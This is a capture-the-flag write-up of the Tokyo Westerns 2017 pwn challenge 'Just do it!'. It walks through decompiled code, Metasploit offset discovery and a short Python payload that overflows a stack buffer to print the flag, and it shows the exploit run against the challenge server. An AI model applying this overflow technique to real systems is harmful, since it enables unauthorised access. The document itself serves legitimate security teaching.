[Pwn] Tokyo Westerns CTF 3rd 2017 - Just do it!

Pwnx86Stack IssueStack Overflow pwn, stack_overflow, tokyoWesterns2017 Comments

Just do it!
Problem

Do it! Do it!

nc pwn1.chal.ctf.westerns.tokyo 12345
(Alternative port: nc pwn1.chal.ctf.westerns.tokyo 12482)

just_do_it

Starting by De-assembler with ida and use its ability to some c pseudo code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [sp+8h] [bp-20h]@7
  FILE *stream; // [sp+18h] [bp-10h]@1
  char *v6; // [sp+1Ch] [bp-Ch]@1

  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 2, 0);
  v6 = failed_message;
  stream = fopen("flag.txt", "r");
  if ( !stream )
  {
    perror("file open error.\n");
    exit(0);
  }
  if ( !fgets(flag, 48, stream) )
  {
    perror("file read error.\n");
    exit(0);
  }
  puts("Welcome my secret service. Do you know the password?");
  puts("Input the password.");
  if ( !fgets(&s, 32, stdin) )
  {
    perror("input error.\n");
    exit(0);
  }
  if ( !strcmp(&s, PASSWORD) )
    v6 = success_message;
  puts(v6);
  return 0;
}

We can see clearly there is a buffer overflow problem on strcmp PASSWORD comes from STDIN, if we give a password greater than the variable s can handle, we will overflow in this one we don’t even need to modify the ret address. We can just modify the address from v6 to the flag variable address! which is stored from a file “flag.txt” in the server.

First lets just discover the offset we could know this by looking at the assembly code and check how space was saved in the stack for this variable by looking the offset from ebp or we can just use gdb with some help from metasploit to generate patterns:

1
2
3
4
5
6
7
8
9
10
$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 50 
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab
$ gdb ./justdoit
pwndbg> r
Starting program: /home/evilgod/Documents/Hacking/ctf/tokyo/pwn/justdoit/just 
Welcome my secret service. Do you know the password?
Input the password.
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab

Program received signal SIGSEGV (fault address 0x37614136)

We can see it broke at address 0x37614136 we again can calculate it in metasploit with pattern_offset

1
2
$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x37614136
[*] Exact match at offset 20

Now we can see we need to add more than 20 characters to overflow! now lets use IDA to get the address where is stored our flag:

Flag Address

And finally writing a script:

1
2
3
FLAG = 0x0804A080
payload = 'A' *20 + struct.pack('<L',FLAG)
print payload

getting the flag….

1
2
3
4
$ python justdoit.py | nc pwn1.chal.ctf.westerns.tokyo 12482
Welcome my secret service. Do you know the password?
Input the password.
TWCTF{pwnable_warmup_I_did_it!}

TeamRocketISTCTF Team

Portuguese Computer Science Students